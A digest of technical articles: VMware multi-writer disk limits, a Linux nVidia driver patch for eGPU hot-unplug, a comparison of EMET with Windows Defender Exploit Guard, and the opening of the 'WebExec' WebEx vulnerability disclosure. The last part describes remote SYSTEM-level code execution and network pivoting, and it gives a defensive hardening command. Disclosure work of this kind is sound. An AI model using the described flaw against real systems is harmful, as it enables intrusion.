VMware virtual disk (VMDK) in Multi Write Mode
( original text by David Pasek )
VMFS is a clustered file system that by default prevents multiple virtual machines from opening and writing to the same virtual disk (VMDK file). This stops more than one virtual machine from inadvertently accessing the same VMDK file and is a safety mechanism to avoid data corruption in cases where the applications in the virtual machines do not keep their writes to the shared disk consistent. However, you might have a third-party cluster-aware application, where the multi-writer option allows VMFS-backed disks to be shared by multiple virtual machines and leverages a third-party OS/application cluster solution to share a single VMDK disk on a VMFS filesystem. With such third-party cluster-aware applications, the applications themselves ensure that writes originating from multiple virtual machines do not cause data loss. Examples of such third-party cluster-aware applications are Oracle RAC, Veritas Cluster File System, etc.
There is a VMware KB article, “Enabling or disabling simultaneous write protection provided by VMFS using the multi-writer flag (1034165)”, available at https://kb.vmware.com/kb/1034165. The KB describes how to enable or disable the simultaneous write protection provided by VMFS using the multi-writer flag. It is the official resource on how to use the multi-writer flag, but the operational procedure is a little bit obsolete, as vSphere 6.x supports configuration from the vSphere Web Client (Flash) or vSphere Client (HTML5) GUI, as highlighted in the screenshot below.
However, KB 1034165 lists several important limitations which should be considered and addressed in the solution design. The limitations of multi-writer mode are:
- The virtual disk must be eager zeroed thick; it cannot be lazy zeroed thick or thin provisioned.
- Sharing is limited to 8 ESXi/ESX hosts with VMFS-3 (vSphere 4.x), VMFS-5 (vSphere 5.x), and VMFS-6 in multi-writer mode.
- Hot adding a virtual disk removes the multi-writer flag.
Let’s focus on the 8 ESXi host limit. The statement about scalability above is a little bit unclear, which is why one of my customers asked me what it really means. I did some research on internal VMware resources and, fortunately enough, found an internal VMware discussion about this topic, so I think sharing the information will help the broader VMware community.
Here is the 8-host limit explained in other words …
“The 8-host limit defines how many ESXi hosts can simultaneously open the same virtual disk (aka VMDK file). If the cluster-aware application is not going to have more than 8 nodes, it works and it is supported. This limitation applies to the group of VMs sharing the same VMDK file for a particular instance of the cluster-aware application. In case you need to consolidate multiple application clusters into a single vSphere cluster, you can safely do so, and app nodes from one app cluster instance can run on different ESXi hosts than app nodes from another app cluster instance. It means that if you have more than one app cluster instance, all app cluster instances together can leverage resources from more than 8 ESXi hosts in the vSphere cluster.”
The best way to fully understand specific behavior is to test it. That’s why I have a pretty decent home lab. However, I do not have 10 physical ESXi hosts, so I created a nested vSphere environment with a vSphere cluster of 9 ESXi hosts. You can see the vSphere cluster with two App Cluster Instances (App1, App2) in the screenshot below.
Application cluster instance App1 is composed of 9 nodes (9 VMs) and instance App2 of just 2 nodes. Each instance shares its own VMDK disk. The whole test infrastructure is conceptually depicted in the figures below.
Test Step 1: I started 8 of the 9 VMs of the App1 cluster instance on 8 ESXi hosts (ESXi01-ESXi08). Such a setup works perfectly fine, as there is a 1:1 mapping between VMs and ESXi hosts, within the limit of 8 ESXi hosts having the shared VMDK1 open.
Test Step 2: The next step is to test the power-on operation of App1-VM9 on ESXi09. This operation fails. This is the expected result, because a 9th ESXi host cannot open the VMDK1 file on the VMFS datastore.
The error message is visible in the screenshot below.
Test Step 3: The next step is to power on App1-VM9 on ESXi01. This operation succeeds, because two app cluster nodes (virtual machines App1-VM1 and App1-VM9) are running on a single ESXi host (ESXi01); therefore only 8 ESXi hosts have the VMDK1 file open and we are within the supported limits.
Test Step 4: Let’s test vMotion of App1-VM9 from ESXi01 to ESXi09. This operation fails. This is the expected result for the same reason as the power-on operation: the App1 cluster instance would be stretched across 9 ESXi hosts, but the 9th ESXi host cannot open the VMDK1 file on the VMFS datastore.
The error message is a little bit different, but the root cause is the same.
Test Step 5: Let’s test vMotion of App2-VM2 from ESXi08 to ESXi09. This operation works, because the App2 cluster instance is still stretched across only two ESXi hosts, so it is within the supported limit of 8 ESXi hosts.
Test Step 6: The last test is vMotion of App2-VM2 from the vSphere cluster (ESXi08) to a standalone ESXi host outside of the vSphere cluster (ESX01). This operation works, because the App2 cluster instance is still stretched across only two ESXi hosts, so it is within the supported limit of 8 ESXi hosts. The vSphere cluster is not a boundary for multi-writer VMDK mode.
FAQ
Q: What exactly does the limitation of 8 ESXi hosts mean?
A: The 8 ESXi host limit defines how many ESXi hosts can simultaneously open the same virtual disk (aka VMDK file). If the cluster-aware application is not going to have more than 8 nodes, it works and it is supported. Details and various scenarios are described in this article.
Q: Where is the information about the locks from ESXi hosts stored?
A: The normal VMFS file locking mechanism is in use; therefore there are VMFS file locks, which can be displayed with the ESXi command: vmkfstools -D
The only difference is that multi-writer VMDKs can have multiple locks, as shown in the screenshot below.
Q: Is it supported to use DRS rules for multi-writer VMDKs when there are more than 8 ESXi hosts in the cluster where the VMs with configured multi-writer VMDKs are running?
A: Yes, it is supported. DRS rules can be beneficial to keep all nodes of a particular App Cluster Instance on specified ESXi hosts. This is neither necessary nor required from the technical point of view, but it can be beneficial from a licensing point of view.
Q: How can the ESXi life cycle be handled with the limit of 8 ESXi hosts?
A: Let’s discuss specific VM operations and the supportability of the multi-writer VMDK configuration. The source for the answers is VMware KB https://kb.vmware.com/kb/1034165
- Power on, off, restart virtual machine – supported
- Suspend VM – unsupported
- Hot add virtual disks — only to existing adapters
- Hot remove devices – supported
- Hot extend virtual disk – unsupported
- Connect and disconnect devices – supported
- Snapshots – unsupported
- Snapshots of VMs with independent-persistent disks – supported
- Cloning – unsupported
- Storage vMotion – unsupported
- Changed Block Tracking (CBT) – unsupported
- vSphere Flash Read Cache (vFRC) – unsupported
- vMotion – supported by VMware for Oracle RAC only and limited to 8 ESX/ESXi hosts. Note: other cluster-aware applications are not supported by VMware but may be supported by partners. For example, Veritas products have their supportability documented at https://sort.veritas.com/public/documents/sfha/6.2/vmwareesx/productguides/html/sfhas_virtualization/ch01s05s01.htm. Please verify current supportability directly with the specific partners.
Q: Is it possible to migrate VMs with multi-writer VMDKs to a different cluster when they are offline?
A: Yes. A VM can be shut down or powered off and then powered on on any ESXi host outside of the vSphere cluster. The only requirement is to have the same VMFS datastore available on the source and target ESXi hosts. Please keep in mind that the maximum supported number of ESXi hosts connected to a single VMFS datastore is 64.
Patching nVidia GPU driver for hot-unplug on Linux
( original text by @whitequark )

Anyway, I was kind of annoyed by rebooting every time it happens, so I decided to reboot a few more dozen times instead while patching the driver. This has indeed worked, and left me with something similar to a functional hot-unplug, mildly crippled by the fact that nvidia-modeset is a completely opaque blob that keeps some internal state and tries to act on it, getting stuck when it tries to do something to the now-missing eGPU.
Turns out, there are only a few issues preventing functional hot-unplug.
- In nvidia_remove, the driver actually checks if anyone’s still trying to use it, and if yes, it tries to just hang the removal process. This doesn’t actually work, or rather, it mostly works by accident. It starts an infinite loop calling os_schedule() while having taken the NV_LINUX_DEVICES lock. While in the default configuration this indeed hangs any reentrant requests into the driver by virtue of NV_CHECK_PCI_CONFIG_SPACE taking the same lock (in verify_pci_bars), passing the NVreg_CheckPCIConfigSpace=0 module option eliminates that accidental safety mechanism, and allows reentrant requests to proceed. They do not crash due to memory being deallocated in nvidia_remove (so you don’t get an unhandled kernel page fault), but they still crash due to being unable to access the GPU.
- The NVKMS component (in the nvidia-modeset module) tries to maintain some state, and change it when e.g. the Xorg instance quits and closes the /dev/nvidia-modeset file. Unfortunately, it does not expect the GPU to go away, and first spews a few messages to dmesg similar to nvidia-modeset: ERROR: GPU:0: Failed to query display engine channel state: 0x0000857d:0:0:0x0000000f, after which it appears to hang somewhere inside the blob, which has been conveniently stripped of all symbols. This needs to be prevented, but…
- The NVKMS component effectively only exposes a single opaque ioctl, and all the communication, including communication of the GPU bus ID, happens out of band with regards to the open source parts of the nvidia-modeset module. Fortunately, NVKMS calls back into NVRM, and this allows us to associate each /dev/nvidia-modeset fd with the GPU bus ID.
- When unloading NVKMS, it also tries to act on its internal state and change the GPU state, which leads to the same hang.
All in all, this allows a patch to be written that detects when a GPU goes away, ignores all further NVKMS requests related to that specific GPU (and returns ENOENT in response to ioctls, which Xorg appropriately interprets as a fault condition), correctly releases the resources by requesting NVRM, and improperly unloads NVKMS so it doesn’t try to reset the GPU state. (All actual resources should be released by this point, and NVKMS doesn’t have any resource allocation callbacks other than those we already intercept, so in theory this doesn’t have any bad consequences. But I’m not working for nVidia, so this might be completely wrong.)
After the GPU is plugged back in, NVKMS will try to act on its internal state again; in this case, it doesn’t hang, but it doesn’t initialize the GPU correctly either, so the nvidia-modeset kernel module has to be (manually) reloaded. It’s not easy to do this automatically, because in a hypothetical system with more than one nVidia GPU the module would still be in use when one of them dies, and so just hard reloading NVKMS would have unfortunate consequences. (Though, I don’t really know whether NVKMS would try to access the dead GPU in response to a request acting on the other GPU anyway. I decided to do it conservatively.) Once it’s reloaded you’re back in the game though!
Here’s the patch, written against the Debian source package:
diff -ur original/common/inc/nv-linux.h patchedl/common/inc/nv-linux.h --- original/common/inc/nv-linux.h 2018-09-23 12:20:02.000000000 +0000 +++ patched/common/inc/nv-linux.h 2018-10-28 07:19:21.526566940 +0000 @@ -1465,6 +1465,7 @@ typedef struct nv_linux_state_s { nv_state_t nv_state; atomic_t usage_count; + atomic_t dead; struct pci_dev *dev; diff -ur original/common/inc/nv-modeset-interface.h patched/common/inc/nv-modeset-interface.h --- original/common/inc/nv-modeset-interface.h 2018-08-22 00:55:23.000000000 +0000 +++ patched/common/inc/nv-modeset-interface.h 2018-10-28 07:22:00.768238371 +0000 @@ -25,6 +25,8 @@ #include "nv-gpu-info.h" +#include <asm/atomic.h> + /* * nvidia_modeset_rm_ops_t::op gets assigned a function pointer from * core RM, which uses the calling convention of arguments on the @@ -115,6 +117,8 @@ int (*set_callbacks)(const nvidia_modeset_callbacks_t *cb); + atomic_t * (*gpu_dead)(NvU32 gpu_id); + } nvidia_modeset_rm_ops_t; NV_STATUS nvidia_get_rm_ops(nvidia_modeset_rm_ops_t *rm_ops); diff -ur original/common/inc/nv-proto.h patched/common/inc/nv-proto.h --- original/common/inc/nv-proto.h 2018-08-22 00:55:23.000000000 +0000 +++ patched/common/inc/nv-proto.h 2018-10-28 07:20:49.939494812 +0000 @@ -81,6 +81,7 @@ NvBool nvidia_get_gpuid_list (NvU32 *gpu_ids, NvU32 *gpu_count); int nvidia_dev_get (NvU32, nvidia_stack_t *); void nvidia_dev_put (NvU32, nvidia_stack_t *); +atomic_t * nvidia_dev_dead (NvU32); int nvidia_dev_get_uuid (const NvU8 *, nvidia_stack_t *); void nvidia_dev_put_uuid (const NvU8 *, nvidia_stack_t *); int nvidia_dev_get_pci_info (const NvU8 *, struct pci_dev **, NvU64 *, NvU64 *); diff -ur original/nvidia/nv.c patched/nvidia/nv.c --- original/nvidia/nv.c 2018-09-23 12:20:02.000000000 +0000 +++ patched/nvidia/nv.c 2018-10-28 07:48:05.895025112 +0000 @@ -1944,6 +1944,12 @@ unsigned int i; NvBool bRemove = NV_FALSE; + if (NV_ATOMIC_READ(nvl->dead)) + { + nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_close called on dead device by pid %d!\n", + current->pid); + } + NV_CHECK_PCI_CONFIG_SPACE(sp, nv, TRUE, TRUE, NV_MAY_SLEEP()); /* for control device, just jump to its open routine */ @@ -2106,6 +2112,12 @@ size_t arg_size; int arg_cmd; + if (NV_ATOMIC_READ(nvl->dead)) + { + nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_ioctl called on dead device by pid %d!\n", + current->pid); + } + nv_printf(NV_DBG_INFO, "NVRM: ioctl(0x%x, 0x%x, 0x%x)\n", _IOC_NR(cmd), (unsigned int) i_arg, _IOC_SIZE(cmd)); @@ -3217,6 +3229,7 @@ NV_INIT_MUTEX(&nvl->ldata_lock); NV_ATOMIC_SET(nvl->usage_count, 0); + NV_ATOMIC_SET(nvl->dead, 0); if (!rm_init_event_locks(sp, nv)) return NV_FALSE; @@ -4018,14 +4031,38 @@ nv_printf(NV_DBG_ERRORS, "NVRM: Attempting to remove minor device %u with non-zero usage count!\n", nvl->minor_num); + nv_printf(NV_DBG_ERRORS, + "NVRM: YOLO, waiting for usage count to drop to zero\n"); WARN_ON(1); - /* We can't continue without corrupting state, so just hang to give the - * user some chance to do something about this before reboot */ - while (1) + NV_ATOMIC_SET(nvl->dead, 1); + + /* Insanity check: wait until all clients die, then hope for the best. */ + while (1) { + UNLOCK_NV_LINUX_DEVICES(); os_schedule(); - } + LOCK_NV_LINUX_DEVICES(); + + nvl = pci_get_drvdata(dev); + if (!nvl || (nvl->dev != dev)) + { + goto done; + } + + if (NV_ATOMIC_READ(nvl->usage_count) == 0) + { + break; + } + } + nv_printf(NV_DBG_ERRORS, + "NVRM: Usage count is now zero, proceeding to remove the GPU\n"); + nv_printf(NV_DBG_ERRORS, + "NVRM: This is not actually supposed to work lol. 
Hope it does tho ????\n"); + nv_printf(NV_DBG_ERRORS, + "NVRM: You probably want to reload nvidia-modeset now if you want any " + "of this to ever start up again, but like, man, that's your choice entirely\n"); + } nv = NV_STATE_PTR(nvl); if (nvl == nv_linux_devices) nv_linux_devices = nvl->next; @@ -4712,6 +4749,22 @@ up(&nvl->ldata_lock); } +atomic_t *nvidia_dev_dead(NvU32 gpu_id) +{ + nv_linux_state_t *nvl; + atomic_t *ret; + + /* Takes nvl->ldata_lock */ + nvl = find_gpu_id(gpu_id); + if (!nvl) + return NV_FALSE; + + ret = &nvl->dead; + up(&nvl->ldata_lock); + + return ret; +} + /* * Like nvidia_dev_get but uses UUID instead of gpu_id. Note that this may * trigger initialization and teardown of unrelated devices to look up their diff -ur original/nvidia/nv-modeset-interface.c patched/nvidia/nv-modeset-interface.c --- original/nvidia/nv-modeset-interface.c 2018-08-22 00:55:22.000000000 +0000 +++ patched/nvidia/nv-modeset-interface.c 2018-10-28 07:20:25.959243110 +0000 @@ -114,6 +114,7 @@ .close_gpu = nvidia_dev_put, .op = rm_kernel_rmapi_op, /* provided by nv-kernel.o */ .set_callbacks = nvidia_modeset_set_callbacks, + .gpu_dead = nvidia_dev_dead, }; if (strcmp(rm_ops->version_string, NV_VERSION_STRING) != 0) diff -ur original/nvidia/nv-reg.h patched/nvidia/nv-reg.h diff -ur original/nvidia-modeset/nvidia-modeset-linux.c patched/nvidia-modeset/nvidia-modeset-linux.c --- original/nvidia-modeset/nvidia-modeset-linux.c 2018-09-23 12:20:02.000000000 +0000 +++ patched/nvidia-modeset/nvidia-modeset-linux.c 2018-10-28 07:47:14.738703417 +0000 @@ -75,6 +75,9 @@ static struct semaphore nvkms_lock; +static NvU32 clopen_gpu_id; +static NvBool leak_on_unload; + /************************************************************************* * NVKMS executes queued work items on a single kthread. *************************************************************************/ @@ -89,6 +92,9 @@ struct nvkms_per_open { void *data; + NvU32 gpu_id; + atomic_t *gpu_dead; + enum NvKmsClientType type; union { @@ -711,6 +717,9 @@ nvidia_modeset_stack_ptr stack = NULL; NvBool ret; + printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_open_gpu called with %08x, pid %d\n", + gpuId, current->pid); + if (__rm_ops.alloc_stack(&stack) != 0) { return NV_FALSE; } @@ -719,6 +728,10 @@ __rm_ops.free_stack(stack); + if (ret) { + clopen_gpu_id = gpuId; + } + return ret; } @@ -726,12 +739,17 @@ { nvidia_modeset_stack_ptr stack = NULL; + printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_close_gpu called with %08x, pid %d\n", + gpuId, current->pid); + if (__rm_ops.alloc_stack(&stack) != 0) { return; } __rm_ops.close_gpu(gpuId, stack); + clopen_gpu_id = gpuId; + __rm_ops.free_stack(stack); } @@ -771,8 +789,14 @@ popen->type = type; + printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_open_common, pid %d\n", + current->pid); + *status = down_interruptible(&nvkms_lock); + printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_open_common, pid %d\n", + current->pid); + if (*status != 0) { goto failed; } @@ -781,6 +805,9 @@ up(&nvkms_lock); + printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_open_common, pid %d\n", + current->pid); + if (popen->data == NULL) { *status = -EPERM; goto failed; @@ -799,10 +826,16 @@ *status = 0; + printk(KERN_INFO NVKMS_LOG_PREFIX "exiting in nvkms_open_common, pid %d\n", + current->pid); + return popen; failed: + printk(KERN_INFO NVKMS_LOG_PREFIX "error in nvkms_open_common, pid %d\n", + current->pid); + nvkms_free(popen, sizeof(*popen)); return NULL; @@ -816,14 +849,36 @@ * mutex. 
*/ + printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_close_common, pid %d\n", + current->pid); + down(&nvkms_lock); - nvKmsClose(popen->data); + printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_close_common, pid %d\n", + current->pid); + + if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) { + printk(KERN_ERR NVKMS_LOG_PREFIX "awwww u need cleanup :3 " + "in nvkms_close_common, pid %d\n", + current->pid); + + nvkms_close_gpu(popen->gpu_id); + + popen->gpu_id = 0; + popen->gpu_dead = NULL; + + leak_on_unload = NV_TRUE; + } else { + nvKmsClose(popen->data); + } popen->data = NULL; up(&nvkms_lock); + printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_close_common, pid %d\n", + current->pid); + if (popen->type == NVKMS_CLIENT_KERNEL_SPACE) { /* * Flush any outstanding nvkms_kapi_event_kthread_q_callback() work @@ -844,6 +899,9 @@ } nvkms_free(popen, sizeof(*popen)); + + printk(KERN_INFO NVKMS_LOG_PREFIX "exiting nvkms_close_common, pid %d\n", + current->pid); } int NVKMS_API_CALL nvkms_ioctl_common @@ -855,20 +913,58 @@ int status; NvBool ret; + printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_ioctl_common, pid %d\n", + current->pid); + status = down_interruptible(&nvkms_lock); if (status != 0) { return status; } + printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_ioctl_common, pid %d\n", + current->pid); + + if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) { + goto dead; + } + + clopen_gpu_id = 0; + if (popen->data != NULL) { ret = nvKmsIoctl(popen->data, cmd, address, size); } else { ret = NV_FALSE; } + if (clopen_gpu_id != 0) { + if (!popen->gpu_id) { + printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x open in nvkms_ioctl_common, " + "pid %d\n", clopen_gpu_id, current->pid); + popen->gpu_id = clopen_gpu_id; + popen->gpu_dead = __rm_ops.gpu_dead(clopen_gpu_id); + } else { + printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x close in nvkms_ioctl_common, " + "pid %d\n", clopen_gpu_id, current->pid); + popen->gpu_id = 0; + popen->gpu_dead = NULL; + } + } + up(&nvkms_lock); + printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_ioctl_common, pid %d\n", + current->pid); + return ret ? 0 : -EPERM; + +dead: + up(&nvkms_lock); + + printk(KERN_ERR NVKMS_LOG_PREFIX "*notices ur gpu is dead* owo whats this " + "in nvkms_ioctl_common, pid %d\n", + current->pid); + + return -ENOENT; } /************************************************************************* @@ -1239,9 +1335,14 @@ nvkms_proc_exit(); - down(&nvkms_lock); - nvKmsModuleUnload(); - up(&nvkms_lock); + if(leak_on_unload) { + printk(KERN_ERR NVKMS_LOG_PREFIX "im just gonna leak all the kms junk ok? " + "haha nvm wasnt a question. in nvkms_exit\n"); + } else { + down(&nvkms_lock); + nvKmsModuleUnload(); + up(&nvkms_lock); + } /* * At this point, any pending tasks should be marked canceled, but |
Here are some handy scripts I was using while debugging it:
#!/bin/sh -ex
modprobe acpi_ipmi
insmod nvidia.ko NVreg_ResmanDebugLevel=-1 NVreg_CheckPCIConfigSpace=0
insmod nvidia-modeset.ko
dmesg -w
#!/bin/sh
rmmod nvidia-modeset
rmmod nvidia
|
#!/bin/sh
exec Xorg :8 -config /etc/bumblebee/xorg.conf.nvidia -configdir /etc/bumblebee/xorg.conf.d -sharevts -nolisten tcp -noreset -verbose 3 -isolateDevice PCI:06:00:0 -modulepath /usr/lib/nvidia/nvidia,/usr/lib/xorg/modules
And finally, here are the relevant kernel and Xorg log messages, showing what happens when a GPU is unplugged:
[ 219.524218] NVRM: loading NVIDIA UNIX x86_64 Kernel Module 390.87 Tue Aug 21 12:33:05 PDT 2018 (using threaded interrupts)
[ 219.527409] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms 390.87 Tue Aug 21 16:16:14 PDT 2018
[ 224.780721] nvidia-modeset: nvkms_open_gpu called with 00000600, pid 4560
[ 224.807370] nvidia-modeset: detected gpu 00000600 open in nvkms_ioctl_common, pid 4560
[ 239.061383] NVRM: GPU at PCI:0000:06:00: GPU-9fe1319c-8dd3-44e4-2b74-de93f8b02c6a
[ 239.061387] NVRM: Xid (PCI:0000:06:00): 79, GPU has fallen off the bus.
[ 239.061389] NVRM: GPU at 0000:06:00.0 has fallen off the bus.
[ 239.061398] NVRM: A GPU crash dump has been created. If possible, please run
NVRM: nvidia-bug-report.sh as root to collect this data before
NVRM: the NVIDIA kernel module is unloaded.
[ 240.209498] NVRM: Attempting to remove minor device 0 with non-zero usage count!
[ 240.209501] NVRM: YOLO, waiting for usage count to drop to zero
[ 241.433499] nvidia-modeset: *notices ur gpu is dead* owo whats this in nvkms_ioctl_common, pid 4560
[ 241.433851] nvidia-modeset: awwww u need cleanup :3 in nvkms_close_common, pid 4560
[ 241.433853] nvidia-modeset: nvkms_close_gpu called with 00000600, pid 4560
[ 250.440498] NVRM: Usage count is now zero, proceeding to remove the GPU
[ 250.440513] NVRM: This is not actually supposed to work lol. Hope it does tho ????
[ 250.440520] NVRM: You probably want to reload nvidia-modeset now if you want any of this to ever start up again, but like, man, that's your choice entirely
[ 250.440870] pci 0000:06:00.1: Dropping the link to 0000:06:00.0
[ 250.440950] pci_bus 0000:06: busn_res: [bus 06] is released
[ 250.440982] pci_bus 0000:07: busn_res: [bus 07-38] is released
[ 250.441012] pci_bus 0000:05: busn_res: [bus 05-38] is released
[ 251.000794] pci_bus 0000:02: Allocating resources
[ 251.001324] pci_bus 0000:02: Allocating resources
[ 253.765953] pcieport 0000:00:1c.0: AER: Corrected error received: 0000:00:1c.0
[ 253.765969] pcieport 0000:00:1c.0: PCIe Bus Error: severity=Corrected, type=Physical Layer, (Receiver ID)
[ 253.765976] pcieport 0000:00:1c.0: device [8086:9d10] error status/mask=00002001/00002000
[ 253.765982] pcieport 0000:00:1c.0: [ 0] Receiver Error (First)
[ 253.841064] pcieport 0000:02:02.0: Refused to change power state, currently in D3
[ 253.843882] pcieport 0000:02:00.0: Refused to change power state, currently in D3
[ 253.846177] pci_bus 0000:03: busn_res: [bus 03] is released
[ 253.846248] pci_bus 0000:04: busn_res: [bus 04-38] is released
[ 253.846300] pci_bus 0000:39: busn_res: [bus 39] is released
[ 253.846348] pci_bus 0000:02: busn_res: [bus 02-39] is released
[ 353.369487] nvidia-modeset: im just gonna leak all the kms junk ok? haha nvm wasnt a question. in nvkms_exit
[ 357.600350] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms 390.87 Tue Aug 21 16:16:14 PDT 2018
[ 244.798] (EE) NVIDIA(GPU-0): WAIT (2, 8, 0x8000, 0x000011f4, 0x00001210)
Comparison between Enhanced Mitigation Experience Toolkit and Windows Defender Exploit Guard
Important
If you are currently using EMET, you should be aware that EMET reached end of life on July 31, 2018. You should consider replacing EMET with exploit protection in Windows Defender ATP.
You can convert an existing EMET configuration file into Exploit protection to make the migration easier and keep your existing settings.
This topic describes the differences between the Enhanced Mitigation Experience Toolkit (EMET) and exploit protection in Windows Defender ATP.
Exploit protection in Windows Defender ATP is our successor to EMET and provides stronger protection, more customization, an easier user interface, and better configuration and management options.
EMET is a standalone product for earlier versions of Windows and provides some mitigation against older, known exploit techniques.
After July 31, 2018, it will not be supported.
For more information about the individual features and mitigations available in Windows Defender ATP, as well as how to enable, configure, and deploy them to better protect your network, see the following topics:
Feature comparison
The table in this section illustrates the differences between EMET and Windows Defender Exploit Guard.
| | Windows Defender Exploit Guard | EMET |
|---|---|---|
| Windows versions | All versions of Windows 10 starting with version 1709 | Windows 8.1; Windows 8; Windows 7. Cannot be installed on Windows 10, version 1709 and later |
| Installation requirements | Windows Security in Windows 10 (no additional installation required). Windows Defender Exploit Guard is built into Windows — it doesn’t require a separate tool or package for management, configuration, or deployment. | Available only as an additional download and must be installed onto a management device |
| User interface | Modern interface integrated with the Windows Security app | Older, complex interface that requires considerable ramp-up training |
| Supportability | Dedicated submission-based support channel[1]. Part of the Windows 10 support lifecycle | Ends after July 31, 2018 |
| Updates | Ongoing updates and development of new features, released twice yearly as part of the Windows 10 semi-annual update channel | No planned updates or development |
| Exploit protection | All EMET mitigations plus new, specific mitigations (see table). Can convert and import existing EMET configurations | Limited set of mitigations |
| Attack surface reduction[2] | Helps block known infection vectors. Can configure individual rules | Limited ruleset configuration only for modules (no processes) |
| Network protection[2] | Helps block malicious network connections | Not available |
| Controlled folder access[2] | Helps protect important folders. Configurable for apps and folders | Not available |
| Configuration with GUI (user interface) | Use Windows Security app to customize and manage configurations | Requires installation and use of EMET tool |
| Configuration with Group Policy | Use Group Policy to deploy and manage configurations | Available |
| Configuration with shell tools | Use PowerShell to customize and manage configurations | Requires use of EMET tool (EMET_CONF) |
| System Center Configuration Manager | Use Configuration Manager to customize, deploy, and manage configurations | Not available |
| Microsoft Intune | Use Intune to customize, deploy, and manage configurations | Not available |
| Reporting | Windows event logs and full audit mode reporting. Full integration with Windows Defender Advanced Threat Protection | Limited Windows event log monitoring |
| Audit mode | Full audit mode with Windows event reporting | Limited to EAF, EAF+, and anti-ROP mitigations |
(1) Requires an enterprise subscription with Azure Active Directory or a Software Assurance ID.
(2) Additional requirements may apply (such as use of Windows Defender Antivirus). See Windows Defender Exploit Guard requirements for more details. Customizable mitigation options that are configured with Exploit protection do not require Windows Defender Antivirus.
Mitigation comparison
The mitigations available in EMET are included in Windows Defender Exploit Guard, under the exploit protection feature.
The table in this section indicates the availability and support of native mitigations between EMET and Exploit protection.
| Mitigation | Available in Windows Defender Exploit Guard | Available in EMET |
|---|---|---|
| Arbitrary code guard (ACG) | Yes | Yes, as «Memory Protection Check» |
| Block remote images | Yes | Yes, as «Load Library Check» |
| Block untrusted fonts | Yes | Yes |
| Data Execution Prevention (DEP) | Yes | Yes |
| Export address filtering (EAF) | Yes | Yes |
| Force randomization for images (Mandatory ASLR) | Yes | Yes |
| NullPage Security Mitigation | Included natively in Windows 10. See Mitigate threats by using Windows 10 security features for more information | Yes |
| Randomize memory allocations (Bottom-Up ASLR) | Yes | Yes |
| Simulate execution (SimExec) | Yes | Yes |
| Validate API invocation (CallerCheck) | Yes | Yes |
| Validate exception chains (SEHOP) | Yes | Yes |
| Validate stack integrity (StackPivot) | Yes | Yes |
| Certificate trust (configurable certificate pinning) | Windows 10 provides enterprise certificate pinning | Yes |
| Heap spray allocation | Ineffective against newer browser-based exploits; newer mitigations provide better protection. See Mitigate threats by using Windows 10 security features for more information | Yes |
| Block low integrity images | Yes | No |
| Code integrity guard | Yes | No |
| Disable extension points | Yes | No |
| Disable Win32k system calls | Yes | No |
| Do not allow child processes | Yes | No |
| Import address filtering (IAF) | Yes | No |
| Validate handle usage | Yes | No |
| Validate heap integrity | Yes | No |
| Validate image dependency integrity | Yes | No |
Note
The Advanced ROP mitigations that are available in EMET are superseded by ACG in Windows 10, while other EMET advanced settings are enabled by default in Windows Defender Exploit Guard as part of enabling the anti-ROP mitigations for a process.
See Mitigate threats by using Windows 10 security features for more information on how Windows 10 employs existing EMET technology.
Technical Rundown of WebExec
This is a technical rundown of a vulnerability that we’ve dubbed «WebExec».
The summary is: a flaw in WebEx’s WebexUpdateService allows anyone with a login to the Windows system where WebEx is installed to run SYSTEM-level code remotely. That’s right: this client-side application that doesn’t listen on any ports is actually vulnerable to remote code execution! A local or domain account will work, making this a powerful way to pivot through networks until it’s patched.
High level details and FAQ at https://webexec.org! Below is a technical writeup of how we found the bug and how it works.
Credit
This vulnerability was discovered by myself and Jeff McJunkin from Counter Hack during a routine pentest. Thanks to Ed Skoudis for permission to post this writeup.
If you have any questions or concerns, I made an email alias specifically for this issue: info@webexec.org!
You can download a vulnerable installer here and a patched one here, in case you want to play with this yourself! It probably goes without saying, but be careful if you run the vulnerable version!
Intro
During a recent pentest, we found an interesting vulnerability in the WebEx client software while we were trying to escalate local privileges on an end-user laptop. Eventually, we realized that this vulnerability is also exploitable remotely (given any domain user account) and decided to give it a name: WebExec. Because every good vulnerability has a name!
As far as we know, a remote attack against a 3rd party Windows service is a novel type of attack. We’re calling the class «thank you for your service», because we can, and are crossing our fingers that more are out there!
The tested version of WebEx is the latest client build as of August 2018: version 3211.0.1801.2200, modified 7/19/2018, SHA1: bf8df54e2f49d06b52388332938f5a875c43a5a7. We’ve tested some older and newer versions since then, and they are still vulnerable.
WebEx released a patch on October 3, but requested that we maintain the embargo until they released their advisory. You can find all the patching instructions on webexec.org.
The good news is, the patched version of this service will only run files that are signed by WebEx. The bad news is, there are a lot of those out there (including the vulnerable version of the service!), and the service can still be started remotely. If you’re concerned about the service being remotely start-able by any user (which you should be!), the following command disables that function:
c:\>sc sdset webexservice D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPLORC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
That removes remote and non-interactive access from the service. It will still be vulnerable to local privilege escalation, though, without the patch.
Privilege Escalation
